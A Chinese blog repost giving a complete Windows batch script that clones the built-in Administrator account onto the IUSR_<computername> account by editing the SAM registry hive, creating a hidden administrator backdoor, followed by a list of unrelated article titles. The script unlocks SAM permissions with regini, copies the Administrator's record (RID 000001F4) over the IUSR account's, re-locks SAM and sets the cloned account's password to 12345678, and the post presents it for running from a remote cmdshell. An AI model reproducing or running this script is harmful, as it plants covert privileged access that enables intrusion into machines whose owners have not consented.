复制并真正隐藏administrator帐号(完全批处理)
来源:互联网 发布:linux apache配置php7 编辑:程序博客网 时间:2024/05/19 10:42
其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现,贴出来吧
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE/SAM/SAM [1 17] >"%windir%/../1.reg"
regini "%windir%/../1.reg"
regedit /e "%windir%/../1.reg" HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/IUSR_%computername%
rem unicode ->ascii
type "%windir%/../1.reg" >"%windir%/../2.reg"
del /q "%windir%/../1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%/../2.reg) do set iusr_id=%%b
del /q "%windir%/../2.reg"
rem export administrator register
regedit /e "%windir%/../1.reg" HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4
type "%windir%/../1.reg" >"%windir%/../2.reg"
del /q "%windir%/../1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%/../2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%/../1.reg
)
)
regedit /s %windir%/../1.reg
del /q %windir%/../1.reg
del /q %windir%/../2.reg
echo HKEY_LOCAL_MACHINE/SAM/SAM [17] >"%windir%/../1.reg"
regini "%windir%/../1.reg"
del /q "%windir%/../1.reg"
net user IUSR_%computername% 12345678
克隆出来的用户名是固定的,随便变换的话要改代码
- 复制并真正隐藏administrator帐号(完全批处理)
- 批处理 复制并压缩文件
- 隐藏Administrator
- 创建新帐号Administrator
- 修改Administrator帐号
- 批处理搜索并复制指定类型文件
- xp隐藏administrator
- 批处理更改工作组为Administrator
- vista home版开启administrator帐号
- 怎样让电脑显示Administrator帐号
- Win7 学习笔记 -- 激活Administrator帐号
- Windows7 管理员administrator帐号开启方法
- Win7怎么快速开启Administrator帐号?
- 批处理查找并复制文件到指定文件夹
- 增加一个隐藏帐号
- 手动克隆隐藏帐号
- 删除window隐藏帐号
- 隐藏WindowsXP帐号
- Linux系统UID和GID详解
- access事务插入多条记录
- http get 命令
- 夹缝中生存的“技术支持”
- SAP 高级应用开发 学习笔记 1 -- RFC
- 复制并真正隐藏administrator帐号(完全批处理)
- AXIS2实例4:wsdl2java(最简单的string)
- ASP.NET页面刷新方法总结(转)
- 框架感悟
- 计算机词组库(1)
- SQL中的REPLACE替换字符函数
- GNU Bash 手册 (0)
- 如何导出自选股
- .NET在Global中利用Timer与Application来实现网站定时器功能